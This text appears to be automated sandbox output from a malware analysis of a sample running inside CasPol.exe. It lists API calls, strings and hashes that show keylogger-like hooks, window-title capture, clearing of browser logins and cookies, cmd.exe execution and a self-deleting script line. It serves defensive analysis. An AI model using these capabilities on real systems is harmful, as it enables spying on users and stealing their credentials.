                                                                                                            • GetLastError.KERNEL32(?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAE3
                                                                                                            • __dosmaperr.LIBCMT ref: 0044AB0E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                            • String ID: `@
                                                                                                            • API String ID: 2583163307-951712118
                                                                                                            • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                            • Instruction ID: 27d3a2ced18f85a81fd98b99658ced531467de2cab5132fdd739c317d4e1371d
                                                                                                            • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                            • Instruction Fuzzy Hash: 56016F3664452016F7215274694977F774D8B42738F25036FF904972D2DD6D8CC5C19F
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                                                                            • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseEventHandleObjectSingleWait
                                                                                                            • String ID: Connection Timeout
                                                                                                            • API String ID: 2055531096-499159329
                                                                                                            • Opcode ID: 0c4e7447b4df129858c303fea986e9e9d1e62a01682a0eac217bcd46973c6bc4
                                                                                                            • Instruction ID: 87453c7fdf87cbb5f51522b6001dca4eac29197b42c1cd59420238f874304a49
                                                                                                            • Opcode Fuzzy Hash: 0c4e7447b4df129858c303fea986e9e9d1e62a01682a0eac217bcd46973c6bc4
                                                                                                            • Instruction Fuzzy Hash: 5F01F5B1900B41AFD325BB3A9C4655ABBE0AB45315700053FF6D396BB1DA38E840CB5A
                                                                                                            APIs
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                                                                              • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 004347EC
                                                                                                              • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 00434810
                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                            • String ID: bad locale name
                                                                                                            • API String ID: 3628047217-1405518554
                                                                                                            • Opcode ID: ea2ce83f6b871e45ddc414103f177035841d2320bb142f548fd828e1a6c8a0e7
                                                                                                            • Instruction ID: 10a02b8eb17e148bebaf39200f5874f6183f8458c9cdff10c330f193d408b506
                                                                                                            • Opcode Fuzzy Hash: ea2ce83f6b871e45ddc414103f177035841d2320bb142f548fd828e1a6c8a0e7
                                                                                                            • Instruction Fuzzy Hash: 3FF0A471400204EAC324FB23D853ACA73649F54748F90497FB446214D2FF3CB618CA8C
                                                                                                            APIs
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExecuteShell
                                                                                                            • String ID: /C $cmd.exe$open
                                                                                                            • API String ID: 587946157-3896048727
                                                                                                            • Opcode ID: fc1d9d8a200ebad5940102133050edab2b9e71f7596d6ef5b18c1bd3a17f0ddd
                                                                                                            • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                                                                            • Opcode Fuzzy Hash: fc1d9d8a200ebad5940102133050edab2b9e71f7596d6ef5b18c1bd3a17f0ddd
                                                                                                            • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                                                                            APIs
                                                                                                            • TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                            • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                            • TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: TerminateThread$HookUnhookWindows
                                                                                                            • String ID: pth_unenc
                                                                                                            • API String ID: 3123878439-4028850238
                                                                                                            • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                            • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                                                                                                            • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                            • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                            • String ID: GetLastInputInfo$User32.dll
                                                                                                            • API String ID: 2574300362-1519888992
                                                                                                            • Opcode ID: ef27dd233418dd298473fac05053b6d64ebabf300391abad082175f6434fde43
                                                                                                            • Instruction ID: d4d82ae3f827bcfb7cdfeca7c6c066ea5703a418acbc3ecfb38afa42acb71bdc
                                                                                                            • Opcode Fuzzy Hash: ef27dd233418dd298473fac05053b6d64ebabf300391abad082175f6434fde43
                                                                                                            • Instruction Fuzzy Hash: 6CB092B85843449BC7212BF1BC0DA293AA8FA48B43720447AF406C21A1EB7881809F6F
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: __alldvrm$_strrchr
                                                                                                            • String ID:
                                                                                                            • API String ID: 1036877536-0
                                                                                                            • Opcode ID: cfbea5d81bad18927c52dc2d7c807fc438def7d9cc968ab0b503f6547692f02c
                                                                                                            • Instruction ID: 44e25d054e292963cfc005d68317528f4d38ac36d82b99eb29904231438c363e
                                                                                                            • Opcode Fuzzy Hash: cfbea5d81bad18927c52dc2d7c807fc438def7d9cc968ab0b503f6547692f02c
                                                                                                            • Instruction Fuzzy Hash: C5A14671A042469FFB218F58C8817AFBBA1EF25354F28416FE5859B382CA3C8D45C759
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free
                                                                                                            • String ID:
                                                                                                            • API String ID: 269201875-0
                                                                                                            • Opcode ID: 3664c7d1b7189549baf4d493e5c665213dd82d933dd96c7687bae007d5c3c42b
                                                                                                            • Instruction ID: 20fe87377ae66d6b83c96c89e5a9e0461ad99f2e5d6db859ec29947640f8945c
                                                                                                            • Opcode Fuzzy Hash: 3664c7d1b7189549baf4d493e5c665213dd82d933dd96c7687bae007d5c3c42b
                                                                                                            • Instruction Fuzzy Hash: CB412D31A00E005BEF24AAB94CD567F37A4EF05775F18031FFC1496293D67C8C05869A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
                                                                                                            • Instruction ID: 06af4f468b8ce8c690b0d071e5f1d97fd8a921e774867ed9179d92c0916ed768
                                                                                                            • Opcode Fuzzy Hash: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
                                                                                                            • Instruction Fuzzy Hash: 3A412971A00744AFE724AF79CC41BAABBE8EB88714F10452FF511DB291E779A9818784
                                                                                                            APIs
                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                                                                            • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 3360349984-0
                                                                                                            • Opcode ID: 54d56c26835f845e219b8fbcfbfaee96f182a1e2e5f8d4c6d7efe874cd7b3d0f
                                                                                                            • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                                                                            • Opcode Fuzzy Hash: 54d56c26835f845e219b8fbcfbfaee96f182a1e2e5f8d4c6d7efe874cd7b3d0f
                                                                                                            • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                                                                            • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Sleep
                                                                                                            • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                            • API String ID: 3472027048-1236744412
                                                                                                            • Opcode ID: a560be4e93f7145764f14036b9ba5e851196c21c3d51501819e25b145e9be97c
                                                                                                            • Instruction ID: 79c0b3a62e4074401f8092341c6d65849921352ddae30cadc40705057ad9e0e2
                                                                                                            • Opcode Fuzzy Hash: a560be4e93f7145764f14036b9ba5e851196c21c3d51501819e25b145e9be97c
                                                                                                            • Instruction Fuzzy Hash: FC31891564C3816ACA11777514167EB6F958A93754F0884BFF8C42B3E3DB7A480893EF
                                                                                                            APIs
                                                                                                              • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                              • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                              • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                                                                                                            • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenQuerySleepValue
                                                                                                            • String ID: @CG$exepath$BG
                                                                                                            • API String ID: 4119054056-3221201242
                                                                                                            • Opcode ID: 7e871a5e45cf0c5aa995f5861383ecd3664757752265a40acd77ba434a7e4b44
                                                                                                            • Instruction ID: 3bb97b322c4281cea59bb4e220ac43bd532ded5f68553a77fc2ada00b9ce30da
                                                                                                            • Opcode Fuzzy Hash: 7e871a5e45cf0c5aa995f5861383ecd3664757752265a40acd77ba434a7e4b44
                                                                                                            • Instruction Fuzzy Hash: EC21F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DF7D9D4581AD
                                                                                                            APIs
                                                                                                              • Part of subcall function 0041B6F6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B706
                                                                                                              • Part of subcall function 0041B6F6: GetWindowTextLengthW.USER32(00000000), ref: 0041B70F
                                                                                                              • Part of subcall function 0041B6F6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B739
                                                                                                            • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                                                                            • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Window$SleepText$ForegroundLength
                                                                                                            • String ID: [ $ ]
                                                                                                            • API String ID: 3309952895-93608704
                                                                                                            • Opcode ID: 98d6b66478057358495496a018cf8b974f91cae2485f626915356807bc928fff
                                                                                                            • Instruction ID: 884b77faaa60fb736012887943be30d2742787962025037229812ea18f618e82
                                                                                                            • Opcode Fuzzy Hash: 98d6b66478057358495496a018cf8b974f91cae2485f626915356807bc928fff
                                                                                                            • Instruction Fuzzy Hash: 2E119F325042005BD218BB26DD17AAEB7A8AF50708F40047FF542221D3EF39AE1986DF
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE
                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5FB
                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B60F
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041B61C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseCreateHandlePointerWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3604237281-0
                                                                                                            • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                            • Instruction ID: 3b94612a358327762e597db0d4245ee78264fa841ead315e3e24d1cb8b3ec7b7
                                                                                                            • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                            • Instruction Fuzzy Hash: 3F01F5712082147FE6104F28AC89EBB739DEB96379F14063AF952C22C0D765CC8596BE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bac99735e7dd953dd7de7a25bc7a472b089e844b0a047387f9cea53258e5f848
                                                                                                            • Instruction ID: dab0b0a7df633c5b48e856b81aae527c8b914588f9bdc990e5f583acd93a84b2
                                                                                                            • Opcode Fuzzy Hash: bac99735e7dd953dd7de7a25bc7a472b089e844b0a047387f9cea53258e5f848
                                                                                                            • Instruction Fuzzy Hash: 5701F2F2A097163EF62116792CC0F6B670DDF413B9B31073BB921622E1EAE8CC42506C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 48cf3eaabf7ece0113a3c008fb104be432a4ec3be30a454fc0a72fbc2683693e
                                                                                                            • Instruction ID: 297bbf4b6e7cb62aad9c1df2c980cfc74e2a715ef03096c7e716b38b90e38ed5
                                                                                                            • Opcode Fuzzy Hash: 48cf3eaabf7ece0113a3c008fb104be432a4ec3be30a454fc0a72fbc2683693e
                                                                                                            • Instruction Fuzzy Hash: 5401D1F2A096167EB7201A7A7DC0D67624EDF823B9371033BF421612D5EAA88C408179
                                                                                                            APIs
                                                                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 0043811F
                                                                                                              • Part of subcall function 0043806C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043809B
                                                                                                              • Part of subcall function 0043806C: ___AdjustPointer.LIBCMT ref: 004380B6
                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 00438134
                                                                                                            • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438145
                                                                                                            • CallCatchBlock.LIBVCRUNTIME ref: 0043816D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                            • String ID:
                                                                                                            • API String ID: 737400349-0
                                                                                                            • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                            • Instruction ID: b756294ed3ea81ca49fa364012696409ae819ba0eb544c37e892c8a1feda9a6f
                                                                                                            • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                            • Instruction Fuzzy Hash: D7012D72100208BBDF126E96CC45DEB7B69EF4C758F04501DFE4866121C73AE862DBA4
                                                                                                            APIs
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue), ref: 00447252
                                                                                                            • GetLastError.KERNEL32(?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446FA1), ref: 0044725E
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044726C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 3177248105-0
                                                                                                            • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                            • Instruction ID: b3fe555fe56df17639c4036f58dc3a809bdc468a9df6621700516029eed46faf
                                                                                                            • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                            • Instruction Fuzzy Hash: 0D01D432649323ABD7214B79BC44A5737D8BB05BA2B2506B1F906E3241D768D802CAE8
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B657
                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B67C
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041B68A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseCreateHandleReadSize
                                                                                                            • String ID:
                                                                                                            • API String ID: 3919263394-0
                                                                                                            • Opcode ID: 84c524a448c010b9be172ba78faf3346c00c98969e38f24d930284b8d2add881
                                                                                                            • Instruction ID: 3f34627ebf18732c46889562bde790f52735f321db32931f0b6625c87776b378
                                                                                                            • Opcode Fuzzy Hash: 84c524a448c010b9be172ba78faf3346c00c98969e38f24d930284b8d2add881
                                                                                                            • Instruction Fuzzy Hash: 81F0F6B12053047FE6101B21BC85FBF375CDB967A5F00027EFC01A22D1DA658C4591BA
                                                                                                            APIs
                                                                                                            • GetSystemMetrics.USER32(0000004C), ref: 00418529
                                                                                                            • GetSystemMetrics.USER32(0000004D), ref: 0041852F
                                                                                                            • GetSystemMetrics.USER32(0000004E), ref: 00418535
                                                                                                            • GetSystemMetrics.USER32(0000004F), ref: 0041853B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: MetricsSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 4116985748-0
                                                                                                            • Opcode ID: a3bedc3d93ee6e0b45313aeec5082688588fe46082e633aeec829f05b9632c7f
                                                                                                            • Instruction ID: f480d68fafb364c29fc67a5f666d93eee18e0abee54110dfc95006384cbaadd6
                                                                                                            • Opcode Fuzzy Hash: a3bedc3d93ee6e0b45313aeec5082688588fe46082e633aeec829f05b9632c7f
                                                                                                            • Instruction Fuzzy Hash: 72F0D672B043256BCA00EA7A4C4156FAB97DFC46A4F25083FE6059B341DE78EC4647D9
                                                                                                            APIs
                                                                                                            • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3E3
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3EB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleOpenProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 39102293-0
                                                                                                            • Opcode ID: 5115dc8d21cc8ae304c84a9c6d3d66be3b1fde84125eb931853a25931357237b
                                                                                                            • Instruction ID: d8943217945b3e3bc9c1dbf33fc4ac7f726da2cd485b5cd5dbfa96192dfeb6c9
                                                                                                            • Opcode Fuzzy Hash: 5115dc8d21cc8ae304c84a9c6d3d66be3b1fde84125eb931853a25931357237b
                                                                                                            • Instruction Fuzzy Hash: 67F04971204209ABD3026794AC4AFEBB26CDF44B96F000037FA11D22A2FF74CCC146A9
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _memcmp
                                                                                                            • String ID: 4[G$4[G
                                                                                                            • API String ID: 2931989736-4028565467
                                                                                                            • Opcode ID: c0cf07660e95b0ee548887709ac0c844436c6f626d7fb978308fdfb467b77264
                                                                                                            • Instruction ID: 33b36a833443cc607bae0a2c4f054eab59dd7b99d1d8389eb50a0704093c1055
                                                                                                            • Opcode Fuzzy Hash: c0cf07660e95b0ee548887709ac0c844436c6f626d7fb978308fdfb467b77264
                                                                                                            • Instruction Fuzzy Hash: E56110716047069AC714DF28D8406B3B7A8FF98304F44063EEC5D8F656E778AA25CBAD
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CountEventTick
                                                                                                            • String ID: >G
                                                                                                            • API String ID: 180926312-1296849874
                                                                                                            • Opcode ID: f703b500cb05a13244301c0645b6086ff7a6bd2c3e191b326370292c0f426d94
                                                                                                            • Instruction ID: 080f125417303e5552765b07387c73e695832f87024c8a27cfac38d5c25ddd71
                                                                                                            • Opcode Fuzzy Hash: f703b500cb05a13244301c0645b6086ff7a6bd2c3e191b326370292c0f426d94
                                                                                                            • Instruction Fuzzy Hash: 7E5191315042409AC224FB71D8A2AEF73E5AFD1314F40853FF94A671E2EF389949C69E
                                                                                                            APIs
                                                                                                            • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB69
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Info
                                                                                                            • String ID: $vD
                                                                                                            • API String ID: 1807457897-3636070802
                                                                                                            • Opcode ID: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                                                            • Instruction ID: 639e137743dbd1cdb094e6b6e994140176401b7572b89e22c1ac552797110b95
                                                                                                            • Opcode Fuzzy Hash: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                                                            • Instruction Fuzzy Hash: 6A411C709043889AEF218F24CCC4AF6BBF9DF45308F1404EEE58A87242D279AA45DF65
                                                                                                            APIs
